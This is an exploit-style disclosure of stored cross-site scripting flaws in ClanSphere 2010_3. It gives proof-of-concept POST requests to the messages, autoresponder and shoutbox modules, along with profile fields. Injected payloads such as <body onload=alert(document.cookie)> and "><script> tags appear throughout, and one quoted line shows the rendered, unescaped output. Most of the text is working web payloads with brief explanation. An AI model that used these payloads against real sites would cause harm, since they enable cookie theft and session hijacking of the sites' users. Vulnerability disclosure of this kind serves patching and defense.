Kod:# exploit title: stored xss in clansphere 2010_3 # date: 22.o2.2o11 # author: lemlajt # software : Clansphere @ sourceforge.net # version: 2010_3 # tested on: linux # cve : # xss-01 PoC : POST http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=create $messages_subject=<body onload=alert('yo')> xss-02 Stored PoC: a. post http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=autoresponder $autoresponder_subject=">">body onload=alert(document.cookie)> $autoresponder_text=">could.be.here.2> b. 'Preview'. c. enjoy Better: This is stored xss: We see this message in our mailbox, and there is "><script>bla... in let's say: 'clear text'. So we decide to delete this 3v1l msg from our mail's! --> [remove] and this is it, stored xss is here;] output src: <td class="leftb">Really delete message <strong>"><body onload=alert('yo')></strong> ?</td> ;] btw: stored xss is also when you add "><script>tag</script> to few inputs in user profile. then save it, and go to edit again. and here you have another xss. * bonus: index.php?mod=shoutbox&action=create ( put "><script>) $sh_nick $sh_text2 regards, lemlajt # -------- # *